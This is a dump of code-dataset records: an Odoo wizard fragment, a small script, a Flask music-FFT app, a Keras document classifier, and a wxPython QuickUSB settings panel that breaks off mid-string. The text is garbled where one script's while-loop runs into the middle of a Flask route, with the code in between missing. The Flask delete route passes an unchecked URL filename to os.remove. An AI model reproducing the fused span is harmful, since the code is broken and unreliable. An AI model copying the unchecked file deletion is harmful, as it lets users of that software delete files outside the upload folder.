self.env['motivo.cancelaciondispersion'].create(motivocancelacion)\n\n","sub_path":"extrasGDL/cajas_municipal/wizard/wizard_dispersion_v3.py","file_name":"wizard_dispersion_v3.py","file_ext":"py","file_size_in_byte":69624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"426337613","text":"#Code-\n\ndef function(s):\n if s.endswith('o'):\n print(\"FILIPINO\")\n elif s.endswith('u'):\n print(\"JAPANESE\")\n else:\n print(\"KOREAN\")\n \n \nm= int(input())\ni=0\nwhile i', methods=['GET'])\ndef getMusic(filename):\n if request.method == 'GET':\n # return config.UPLOAD_FOLDER\n return send_from_directory(directory=config.UPLOAD_FOLDER, filename=filename)\n\n\ndef allowed_file(filename):\n return '.' 
in filename and \\\n filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\n\n\ndef transformFileName(filename):\n # input.mp3 = input_mp3.csv\n return \"_\".join(filename.split('.')) + '.csv'\n\n\n@app.route('/fft', methods=['GET'])\ndef calculate():\n if request.method == 'GET':\n # do validation on input\n fin = request.args.get('in')\n fout = transformFileName(fin)\n\n if fft.run(fin, fout):\n return redirect('/')\n else:\n return redirect('/')\n\n\n@app.route('/chart', methods=['GET'])\ndef chart():\n if request.method == 'GET':\n x, y, z = fft.read(request.args.get('in'))\n return json.dumps({'x': x, 'y': y, 'z': z})\n\n\n@app.route('/delete/<filename>', methods=['GET'])\ndef delete(filename):\n if request.method == 'GET':\n os.remove(config.UPLOAD_FOLDER+\"/\"+filename)\n os.remove(config.OUTPUT_FOLDER+\"/\"+transformFileName(filename))\n return json.dumps({'removed': filename})\n\n\nif __name__ == '__main__':\n app.run(debug=True, threaded=True)\n","sub_path":"musicfft.py","file_name":"musicfft.py","file_ext":"py","file_size_in_byte":3264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"421572478","text":"from keras.models import load_model\nfrom keras.preprocessing.image import load_img\nfrom keras.preprocessing.image import img_to_array\nfrom keras.preprocessing.sequence import pad_sequences\nimport numpy as np\nimport json\n\nclass Classifier():\n\n classes = {0:'CDI', 1:'CNH', 2:'C_NASCIMENTO', 3:'PASSAPORTE', 4:'RG', 5:'TITULO_ELEITORIAL'}\n \n def __init__(self, path):\n data_config = json.load(open(\"../charcnn_data_config.json\", encoding=\"utf8\"))\n \n self.alphabet_size = data_config[\"data\"][\"alphabet_size\"]\n self.length = data_config[\"data\"][\"input_size\"]\n self.model = load_model(path)\n self.model._make_predict_function()\n self.alphabet = \" abcdefghijklmnopqrstuvwxyz0123456789-,;.!?:'\\\"/\\\\|_@#$%^&*~`+-=<>()[]{}\"\n self.dict = {} # Maps each character to an integer\n self.no_of_classes = 6\n for idx, char in enumerate(self.alphabet):\n self.dict[char] = idx + 1\n \n def predict(self, text_source, image_source):\n formatted_image = self.get_image_array(image_source)\n formatted_text = self.get_text_3dim(text_source)\n prediction = self.model.predict([formatted_text, formatted_image])\n prediction_index = np.where(prediction[0] == np.amax(prediction[0]))\n return self.classes[prediction_index[0][0]] \n\n def vectorize_sentences(self, data, char_indices):\n X = []\n\n for doc in data:\n \n x = [char_indices[w] if w in self.alphabet else 0 for w in doc.lower()]\n x2 = np.eye(self.alphabet_size + 1)[x]\n X.append(x2)\n \n return pad_sequences(X, maxlen=self.length, padding=\"pre\")\n\n def get_text_3dim(self, text_source):\n data = []\n \n data.append(text_source)\n self.data = np.array(data)\n\n char_indices = dict((c, i) for i, c in enumerate(self.alphabet,1))\n indices_char = dict((i, c) for i, c in enumerate(self.alphabet,1))\n\n \n formatted_text = self.vectorize_sentences(self.data, char_indices)\n return formatted_text\n\n def get_image_array(self, image_path):\n img = load_img(image_path, target_size=(150,150), color_mode='grayscale')\n img_array = img_to_array(img)\n img_data = np.array([img_array])\n return img_data","sub_path":"api/src/api/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"651402756","text":"#Boa:FramePanel:panelSettings\n\"\"\"\n============================================================================\n Title : panelSettings.py\n Description : QuickUSB Python API Interface\n Notes : \n History :\n\n Copyright (c) 2020 Bitwise Systems, Inc.\n\n Permission is hereby granted, free of charge, to any person obtaining \n a copy of this software and associated documentation files (the \"Software\"), \n to deal in the Software without restriction, including without limitation \n the rights to use, copy, modify, merge, publish, distribute, sublicense, \n and/or sell copies of the Software, and to permit persons to whom the \n Software is furnished to do so, subject to the following conditions:\n\n The above copyright notice and this permission notice shall be included \n in all copies or substantial portions of the Software.\n\n THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS \n OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \n FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL \n THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER \n LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, \n OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS \n IN THE SOFTWARE.\n\n============================================================================\n\"\"\"\n\n# wx imports\nimport wx\n\n#Python imports\nimport time\n\n# Bitwise Systems imports\nfrom QuickUsb import *\nfrom BitTwiddler import *\n\n# Generated Boa Constructor wx IDs\n[wxID_PANELSETTINGS, wxID_PANELSETTINGSBTSCPUCONFIGH, \n wxID_PANELSETTINGSBTSCPUCONFIGL, wxID_PANELSETTINGSBTSDATAADDRESSH, \n wxID_PANELSETTINGSBTSDATAADDRESSL, wxID_PANELSETTINGSBTSEP26CONFIGH, \n wxID_PANELSETTINGSBTSEP26CONFIGL, wxID_PANELSETTINGSBTSFIFOCONFIGH, \n wxID_PANELSETTINGSBTSFIFOCONFIGL, wxID_PANELSETTINGSBTSFPGATYPEH, \n wxID_PANELSETTINGSBTSFPGATYPEL, wxID_PANELSETTINGSBTSI2CTLH, \n wxID_PANELSETTINGSBTSI2CTLL, wxID_PANELSETTINGSBTSPINFLAGSH, \n wxID_PANELSETTINGSBTSPINFLAGSL, wxID_PANELSETTINGSBTSPORTACCFGH, \n wxID_PANELSETTINGSBTSPORTACCFGL, wxID_PANELSETTINGSBTSPORTAH, \n wxID_PANELSETTINGSBTSPORTAL, wxID_PANELSETTINGSBTSPORTBH, \n wxID_PANELSETTINGSBTSPORTBL, wxID_PANELSETTINGSBTSPORTCH, \n wxID_PANELSETTINGSBTSPORTCL, wxID_PANELSETTINGSBTSPORTDH, \n wxID_PANELSETTINGSBTSPORTDL, wxID_PANELSETTINGSBTSPORTEH, \n wxID_PANELSETTINGSBTSPORTEL, wxID_PANELSETTINGSBTSSLAVEFIFOFLAGSH, \n wxID_PANELSETTINGSBTSSLAVEFIFOFLAGSL, wxID_PANELSETTINGSBTSSPICONFIGH, \n wxID_PANELSETTINGSBTSSPICONFIGL, wxID_PANELSETTINGSBTSVERSIONBUILDH, \n wxID_PANELSETTINGSBTSVERSIONBUILDL, wxID_PANELSETTINGSBTSVERSIONSPEEDH, \n wxID_PANELSETTINGSBTSVERSIONSPEEDL, wxID_PANELSETTINGSBTSWORDWIDEH, \n wxID_PANELSETTINGSBTSWORDWIDEL, wxID_PANELSETTINGSPSETTINGS, \n wxID_PANELSETTINGSSBSETTINGS, \n] = [wx.NewId() for _init_ctrls in range(39)]\n\nclass panelSettings(wx.Panel):\n def _init_coll_szsbSettings_Items(self, parent):\n # generated method, don't edit\n\n parent.AddWindow(self.pSettings, 0, border=0, flag=wx.GROW)\n\n def _init_coll_bszSettingsMain_Items(self, parent):\n # generated method, don't edit\n\n parent.AddSizer(self.szsbSettings, 0, border=0, flag=wx.GROW)\n\n def _init_coll_szbSettings_Items(self, parent):\n # generated method, don't edit\n\n parent.AddSizer(self.szgSettings, 1, border=4, flag=wx.GROW | wx.ALL)\n\n def _init_coll_szgSettings_Items(self, parent):\n # generated method, don't 
edit\n\n parent.AddWindow(self.btsEP26CONFIGH, 0, border=0, flag=0)\n parent.AddWindow(self.btsEP26CONFIGL, 0, border=0, flag=0)\n parent.AddWindow(self.btsWORDWIDEH, 0, border=0, flag=0)\n parent.AddWindow(self.btsWORDWIDEL, 0, border=0, flag=0)\n parent.AddWindow(self.btsDATAADDRESSH, 0, border=0, flag=0)\n parent.AddWindow(self.btsDATAADDRESSL, 0, border=0,\n flag=0)\n parent.AddWindow(self.btsFIFOCONFIGH, 0, border=0, flag=0)\n parent.AddWindow(self.btsFIFOCONFIGL, 0, border=0,\n flag=0)\n parent.AddWindow(self.btsFPGATYPEH, 0, border=0, flag=0)\n parent.AddWindow(self.btsFPGATYPEL, 0, border=0,\n flag=0)\n parent.AddWindow(self.btsCPUCONFIGH, 0, border=0, flag=0)\n parent.AddWindow(self.btsCPUCONFIGL, 0, border=0,\n flag=0)\n parent.AddWindow(self.btsSPICONFIGH, 0, border=0, flag=0)\n parent.AddWindow(self.btsSPICONFIGL, 0, border=0,\n flag=0)\n parent.AddWindow(self.btsSLAVEFIFOFLAGSH, 0, border=0, flag=0)\n parent.AddWindow(self.btsSLAVEFIFOFLAGSL, 0, border=0,\n flag=0)\n parent.AddWindow(self.btsI2CTLH, 0, border=0, flag=0)\n parent.AddWindow(self.btsI2CTLL, 0, border=0,\n flag=0)\n parent.AddWindow(self.btsPORTAH, 0, border=0, flag=0)\n parent.AddWindow(self.btsPORTAL, 0, border=0,\n flag=0)\n parent.AddWindow(self.btsPORTBH, 0, border=0, flag=0)\n parent.AddWindow(self.btsPORTBL, 0, border=0,\n flag=0)\n parent.AddWindow(self.btsPORTCH, 0, border=0, flag=0)\n parent.AddWindow(self.btsPORTCL, 0, border=0,\n flag=0)\n parent.AddWindow(self.btsPORTDH, 0, border=0, flag=0)\n parent.AddWindow(self.btsPORTDL, 0, border=0,\n flag=0)\n parent.AddWindow(self.btsPORTEH, 0, border=0, flag=0)\n parent.AddWindow(self.btsPORTEL, 0, border=0,\n flag=0)\n parent.AddWindow(self.btsPORTACCFGH, 0, border=0, flag=0)\n parent.AddWindow(self.btsPORTACCFGL, 0, border=0,\n flag=0)\n parent.AddWindow(self.btsPINFLAGSH, 0, border=0, flag=0)\n parent.AddWindow(self.btsPINFLAGSL, 0, border=0,\n flag=0)\n parent.AddWindow(self.btsVERSIONBUILDH, 0, border=0, flag=0)\n parent.AddWindow(self.btsVERSIONBUILDL, 0, border=0,\n flag=0)\n parent.AddWindow(self.btsVERSIONSPEEDH, 0, border=0, flag=0)\n parent.AddWindow(self.btsVERSIONSPEEDL, 0, border=0,\n flag=0)\n\n def _init_sizers(self):\n # generated method, don't edit\n self.bszSettingsMain = wx.BoxSizer(orient=wx.VERTICAL)\n\n self.szbSettings = wx.BoxSizer(orient=wx.HORIZONTAL)\n\n self.szsbSettings = wx.StaticBoxSizer(box=self.sbSettings,\n orient=wx.HORIZONTAL)\n\n self.szgSettings = wx.GridSizer(cols=2, hgap=16, rows=18, vgap=2)\n\n self._init_coll_bszSettingsMain_Items(self.bszSettingsMain)\n self._init_coll_szbSettings_Items(self.szbSettings)\n self._init_coll_szsbSettings_Items(self.szsbSettings)\n self._init_coll_szgSettings_Items(self.szgSettings)\n\n self.SetSizer(self.bszSettingsMain)\n self.pSettings.SetSizer(self.szbSettings)\n\n def _init_ctrls(self, prnt):\n # generated method, don't edit\n wx.Panel.__init__(self, id=wxID_PANELSETTINGS, name='panelSettings',\n parent=prnt, pos=wx.Point(654, 293), size=wx.Size(591, 407),\n style=wx.TAB_TRAVERSAL)\n self.SetClientSize(wx.Size(575, 369))\n\n self.sbSettings = wx.StaticBox(id=wxID_PANELSETTINGSSBSETTINGS,\n label='Settings', name='sbSettings', parent=self, pos=wx.Point(0,\n 0), size=wx.Size(575, 388), style=0)\n\n self.pSettings = wx.Panel(id=wxID_PANELSETTINGSPSETTINGS,\n name='pSettings', parent=self, pos=wx.Point(5, 17),\n size=wx.Size(512, 366), style=wx.TAB_TRAVERSAL)\n\n self.btsPORTDL = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSPORTDL, label='IOD', name='btsPORTDL',\n 
parent=self.pSettings, pos=wx.Point(264, 244), showlabel=True,\n size=wx.Size(244, 18), style=wx.NO_BORDER, tagint=12,\n tooltips=['Bit 0: PD[0] Value', 'Bit 1: PD[1] Value',\n 'Bit 2: PD[2] Value', 'Bit 3: PD[3] Value', 'Bit 4: PD[4] Value',\n 'Bit 5: PD[5] Value', 'Bit 6: PD[6] Value', 'Bit 7: PD[7] Value'],\n value=0)\n self.btsPORTDL.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSPORTDL)\n\n self.btsPORTDH = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSPORTDH, label='OED', name='btsPORTDH',\n parent=self.pSettings, pos=wx.Point(4, 244), showlabel=True,\n size=wx.Size(244, 18), style=wx.NO_BORDER, tagint=12,\n tooltips=['Bit 0: PD[0] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 1: PD[1] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 2: PD[2] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 3: PD[3] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 4: PD[4] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 5: PD[5] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 6: PD[6] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 7: PD[7] Output Enable\\n 0 - Input\\n 1 - Output'],\n value=0)\n self.btsPORTDH.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSPORTDH)\n\n self.btsWORDWIDEH = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSWORDWIDEH, label='WORDWIDE',\n name='btsWORDWIDEH', parent=self.pSettings, pos=wx.Point(4, 24),\n showlabel=True, size=wx.Size(227, 18), style=wx.NO_BORDER,\n tagint=1, tooltips=['Bit 0: Reserved', 'Bit 1: Reserved',\n 'Bit 2: Reserved', 'Bit 3: Reserved', 'Bit 4: Reserved',\n 'Bit 5: Reserved', 'Bit 6: Reserved', 'Bit 7: Reserved'],\n value=0)\n self.btsWORDWIDEH.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSWORDWIDEH)\n\n self.btsWORDWIDEL = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSWORDWIDEL, label='WORDWIDE',\n name='btsWORDWIDEL', parent=self.pSettings, pos=wx.Point(281, 24),\n showlabel=True, size=wx.Size(227, 18), style=wx.NO_BORDER,\n tagint=1,\n tooltips=['Bit 0: WORDWIDE Data Width\\n 0 - 8-bits\\n 1 - 16-bits',\n 'Bit 1: Reserved', 'Bit 2: Reserved', 'Bit 3: Reserved',\n 'Bit 4: Reserved', 'Bit 5: Reserved', 'Bit 6: Reserved',\n 'Bit 7: Reserved'], value=0)\n self.btsWORDWIDEL.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSWORDWIDEL)\n\n self.btsPINFLAGSL = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSPINFLAGSL, label='PINFLAGSCD',\n name='btsPINFLAGSL', parent=self.pSettings, pos=wx.Point(264,\n 304), showlabel=True, size=wx.Size(244, 18), style=wx.NO_BORDER,\n tagint=15, tooltips=['Bit 0: FLAGC[0]', 'Bit 1: FLAGC[1]',\n 'Bit 2: FLAGC[2]', 'Bit 3: FLAGC[3]', 'Bit 4: FLAGD[0]',\n 'Bit 5: FLAGD[1]', 'Bit 6: FLAGD[2]', 'Bit 7: FLAGD[3]'],\n value=0)\n self.btsPINFLAGSL.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSPINFLAGSL)\n\n self.btsPINFLAGSH = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSPINFLAGSH, label='PINFLAGSAB',\n name='btsPINFLAGSH', parent=self.pSettings, pos=wx.Point(4, 304),\n showlabel=True, size=wx.Size(244, 18), style=wx.NO_BORDER,\n tagint=15, tooltips=['Bit 0: FLAGA[0]', 'Bit 1: FLAGA[1]',\n 'Bit 2: FLAGA[2]', 'Bit 3: FLAGA[3]', 'Bit 4: FLAGB[0]',\n 'Bit 5: FLAGB[1]', 'Bit 6: FLAGB[2]', 'Bit 7: FLAGB[3]'],\n value=0)\n self.btsPINFLAGSH.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSPINFLAGSH)\n\n self.btsSPICONFIGH = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSSPICONFIGH, label='PORTECFG',\n name='btsSPICONFIGH', 
parent=self.pSettings, pos=wx.Point(4, 124),\n showlabel=True, size=wx.Size(244, 18), style=wx.NO_BORDER,\n tagint=6, tooltips=['Bit 0: Reserved', 'Bit 1: Reserved',\n 'Bit 2: Reserved', 'Bit 3: Reserved', 'Bit 4: Reserved',\n 'Bit 5: Reserved', 'Bit 6: Reserved',\n 'Bit 7: GPIFA[8] - Enable GPIF Address Pins\\n 0 - Configure PE[7] as GPIO\\n 1 - Configure PE[7] as GPIFADR[8] output'],\n value=0)\n self.btsSPICONFIGH.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSSPICONFIGH)\n\n self.btsSPICONFIGL = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSSPICONFIGL, label='SPICONFIG',\n name='btsSPICONFIGL', parent=self.pSettings, pos=wx.Point(264,\n 124), showlabel=True, size=wx.Size(244, 18), style=wx.NO_BORDER,\n tagint=6,\n tooltips=['Bit 0: SPIENDIAN - SPI Bit Endianness\\n 0 - LSBit to MSBit\\n 1 - MSBit to LSBit',\n 'Bit 1: SPICPOL - SPI Clock Polarity\\n 0 - Normal\\n 1 - Inverted',\n 'Bit 2: SPICPHA - SPI Clock Phase\\n 0 - Sample Then Clock\\n 1 - Clock Then Sample',\n 'Bit 3: SPIPORT - Select Port for SPI/FPGA communication\\n 0 - Use Port E\\n 1 - Use Port A',\n 'Bit 4: NCEPIN - Select the pin for the nCE line\\n 0 - nCE is on pin 2 of SPIPORT\\n 1 - nCE is on pin 7 of SPIPORT',\n 'Bit 5: MISOPIN - Select the port for the MISO line\\n 0 - MISO is on pin 5 of SPIPORT\\n 1 - MISO is on pin 2 of SPIPORT',\n 'Bit 6: Reserved', 'Bit 7: Reserved'], value=0)\n self.btsSPICONFIGL.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSSPICONFIGL)\n\n self.btsSLAVEFIFOFLAGSH = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSSLAVEFIFOFLAGSH, label='SlaveFIFO',\n name='btsSLAVEFIFOFLAGSH', parent=self.pSettings, pos=wx.Point(4,\n 144), showlabel=True, size=wx.Size(244, 18), style=wx.NO_BORDER,\n tagint=7, tooltips=['Bit 0: EP6 Full Flag',\n 'Bit 1: EP6 Empty Flag', 'Bit 2: Reserved',\n 'Bit 3: RDY[0] - Pin Status', 'Bit 4: Reserved',\n 'Bit 5: Reserved', 'Bit 6: Reserved', 'Bit 7: Reserved'],\n value=0)\n self.btsSLAVEFIFOFLAGSH.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSSLAVEFIFOFLAGSH)\n\n self.btsSLAVEFIFOFLAGSL = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSSLAVEFIFOFLAGSL, label='SlaveFIFO',\n name='btsSLAVEFIFOFLAGSL', parent=self.pSettings,\n pos=wx.Point(264, 144), showlabel=True, size=wx.Size(244, 18),\n style=wx.NO_BORDER, tagint=7, tooltips=['Bit 0: EP2 Full Flag',\n 'Bit 1: EP2 Empty Flag', 'Bit 2: Reserved',\n 'Bit 3: RDY[1] Pin Status', 'Bit 4: Reserved', 'Bit 5: Reserved',\n 'Bit 6: Reserved', 'Bit 7: Reserved'], value=0)\n self.btsSLAVEFIFOFLAGSL.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSSLAVEFIFOFLAGSL)\n\n self.btsCPUCONFIGL = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSCPUCONFIGL, label='CPUCONFIG',\n name='btsCPUCONFIGL', parent=self.pSettings, pos=wx.Point(264,\n 104), showlabel=True, size=wx.Size(244, 18), style=wx.NO_BORDER,\n tagint=5, tooltips=['Bit 0: Reserved',\n 'Bit 1: CLKOE - CLKOUT Output Enable\\n 0 - Tri-state the CLKOUT Pin\\n 1 - Drive the CLKOUT Pin',\n 'Bit 2: CLKINV - Invert CLKOUT Pin\\n 0 - Nomal\\n 1 - Invert',\n 'Bit 3: CLKSPD[0] - CPU Clock Speed\\n 00 - 12 MHz\\n 01 - 24 MHz\\n 10 - 48 MHz\\n 11=Reserved',\n 'Bit 4: CLKSPD[1] - CPU Clock Speed\\n 00 - 12 MHz\\n 01 - 24 MHz\\n 10 - 48 MHz\\n 11=Reserved',\n 'Bit 5: Reserved', 'Bit 6: Reserved', 'Bit 7: Reserved'],\n value=0)\n self.btsCPUCONFIGL.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSCPUCONFIGL)\n\n self.btsCPUCONFIGH = BitTwiddler(bits=8, 
bitspacing=4,\n id=wxID_PANELSETTINGSBTSCPUCONFIGH, label='BusSpeed',\n name='btsCPUCONFIGH', parent=self.pSettings, pos=wx.Point(4, 104),\n showlabel=True, size=wx.Size(244, 18), style=wx.NO_BORDER,\n tagint=5, tooltips=['Bit 0: Reserved', 'Bit 1: Reserved',\n 'Bit 2: Reserved', 'Bit 3: Reserved', 'Bit 4: Reserved',\n 'Bit 5: Reserved', 'Bit 6: Reserved',\n 'Bit 7: USB Bus Speed\\n 0 - Force Full-Speed (12 Mbps)\\n 1 - Allow High-Speed (480 Mbps)'],\n value=0)\n self.btsCPUCONFIGH.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSCPUCONFIGH)\n\n self.btsPORTACCFGH = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSPORTACCFGH, label='PORTACFG',\n name='btsPORTACCFGH', parent=self.pSettings, pos=wx.Point(4, 284),\n showlabel=True, size=wx.Size(244, 18), style=wx.NO_BORDER,\n tagint=14,\n tooltips=['Bit 0: INT0 - Interrupt 0 Alternate Configuration\\n 0 - PA[0] not configured as interrupt\\n 1 - PA[0] configured as interrupt input\\nNOTE: INT0 is currently not used',\n 'Bit 1: INT1 - Interrupt 1 Alternate Configuration\\n 0 - PA[1] not configured as interrupt\\n 1 - PA[1] configured as interrupt input\\nNOTE: INT1 is currently not used',\n 'Bit 2: Reserved', 'Bit 3: Reserved', 'Bit 4: Reserved',\n 'Bit 5: Reserved',\n 'Bit 6: SLCS - Slave FIFO Chip Select Alternate Configuration\\n 0 - PA[7] not configured as SLCS input in Slave Mode\\n 1 - PA[7] confiured as SLCS input in Slave Mode\\nNote: If both bit 15 (FLAGD) and bit 14 (SLCS) are set,\\nPA[7] will be configured to give the FLAGD status',\n 'Bit 7: FLAGD - Flag D Alternate Configuration\\n 0 - PA[7] does not give FLAGD status in Slave Mode\\n 1 - PA[7] gives FLAGD status when in Slave Mode\\nNote: If both bit 15 (FLAGD) and bit 14 (SLCS) are set,\\nPA[7] will be configured to give the FLAGD status'],\n value=0)\n self.btsPORTACCFGH.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSPORTACCFGH)\n\n self.btsPORTACCFGL = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSPORTACCFGL, label='PORTCCFG',\n name='btsPORTACCFGL', parent=self.pSettings, pos=wx.Point(264,\n 284), showlabel=True, size=wx.Size(244, 18), style=wx.NO_BORDER,\n tagint=14,\n tooltips=['Bit 0: GPIFA[0] - Enable GPIF Address Pins\\n 0 - Configure PC[0] as GPIO\\n 1 - Configure PC[0] as GPIFADR[7] output',\n 'Bit 1: GPIFA[1] - Enable GPIF Address Pins\\n 0 - Configure PC[1] as GPIO\\n 1 - Configure PC[1] as GPIFADR[7] output',\n 'Bit 2: GPIFA[2] - Enable GPIF Address Pins\\n 0 - Configure PC[2] as GPIO\\n 1 - Configure PC[2] as GPIFADR[7] output',\n 'Bit 3: GPIFA[3] - Enable GPIF Address Pins\\n 0 - Configure PC[3] as GPIO\\n 1 - Configure PC[3] as GPIFADR[7] output',\n 'Bit 4: GPIFA[4] - Enable GPIF Address Pins\\n 0 - Configure PC[4] as GPIO\\n 1 - Configure PC[4] as GPIFADR[7] output',\n 'Bit 5: GPIFA[5] - Enable GPIF Address Pins\\n 0 - Configure PC[5] as GPIO\\n 1 - Configure PC[5] as GPIFADR[7] output',\n 'Bit 6: GPIFA[6] - Enable GPIF Address Pins\\n 0 - Configure PC[6] as GPIO\\n 1 - Configure PC[6] as GPIFADR[7] output',\n 'Bit 7: GPIFA[7] - Enable GPIF Address Pins\\n 0 - Configure PC[7] as GPIO\\n 1 - Configure PC[7] as GPIFADR[7] output'],\n value=0)\n self.btsPORTACCFGL.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSPORTACCFGL)\n\n self.btsPORTAH = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSPORTAH, label='OEA', name='btsPORTAH',\n parent=self.pSettings, pos=wx.Point(4, 184), showlabel=True,\n size=wx.Size(244, 18), style=wx.NO_BORDER, tagint=9,\n tooltips=['Bit 0: 
PA[0] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 1: PA[1] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 2: PA[2] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 3: PA[3] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 4: PA[4] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 5: PA[5] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 6: PA[6] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 7: PA[7] Output Enable\\n 0 - Input\\n 1 - Output'],\n value=0)\n self.btsPORTAH.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSPORTAH)\n\n self.btsPORTAL = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSPORTAL, label='IOA', name='btsPORTAL',\n parent=self.pSettings, pos=wx.Point(264, 184), showlabel=True,\n size=wx.Size(244, 18), style=wx.NO_BORDER, tagint=9,\n tooltips=['Bit 0: PA[0] Value', 'Bit 1: PA[1] Value',\n 'Bit 2: PA[2] Value', 'Bit 3: PA[3] Value', 'Bit 4: PA[4] Value',\n 'Bit 5: PA[5] Value', 'Bit 6: PA[6] Value', 'Bit 7: PA[7] Value'],\n value=0)\n self.btsPORTAL.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSPORTAL)\n\n self.btsPORTCH = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSPORTCH, label='OEC', name='btsPORTCH',\n parent=self.pSettings, pos=wx.Point(4, 224), showlabel=True,\n size=wx.Size(244, 18), style=wx.NO_BORDER, tagint=11,\n tooltips=['Bit 0: PC[0] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 1: PC[1] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 2: PC[2] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 3: PC[3] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 4: PC[4] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 5: PC[5] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 6: PC[6] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 7: PC[7] Output Enable\\n 0 - Input\\n 1 - Output'],\n value=0)\n self.btsPORTCH.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSPORTCH)\n\n self.btsPORTEL = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSPORTEL, label='IOE', name='btsPORTEL',\n parent=self.pSettings, pos=wx.Point(264, 264), showlabel=True,\n size=wx.Size(244, 18), style=wx.NO_BORDER, tagint=13,\n tooltips=['Bit 0: PE[0] Value', 'Bit 1: PE[1] Value',\n 'Bit 2: PE[2] Value', 'Bit 3: PE[3] Value', 'Bit 4: PE[4] Value',\n 'Bit 5: PE[5] Value', 'Bit 6: PE[6] Value', 'Bit 7: PE[7] Value'],\n value=0)\n self.btsPORTEL.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSPORTEL)\n\n self.btsPORTCL = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSPORTCL, label='IOC', name='btsPORTCL',\n parent=self.pSettings, pos=wx.Point(264, 224), showlabel=True,\n size=wx.Size(244, 18), style=wx.NO_BORDER, tagint=11,\n tooltips=['Bit 0: PC[0] 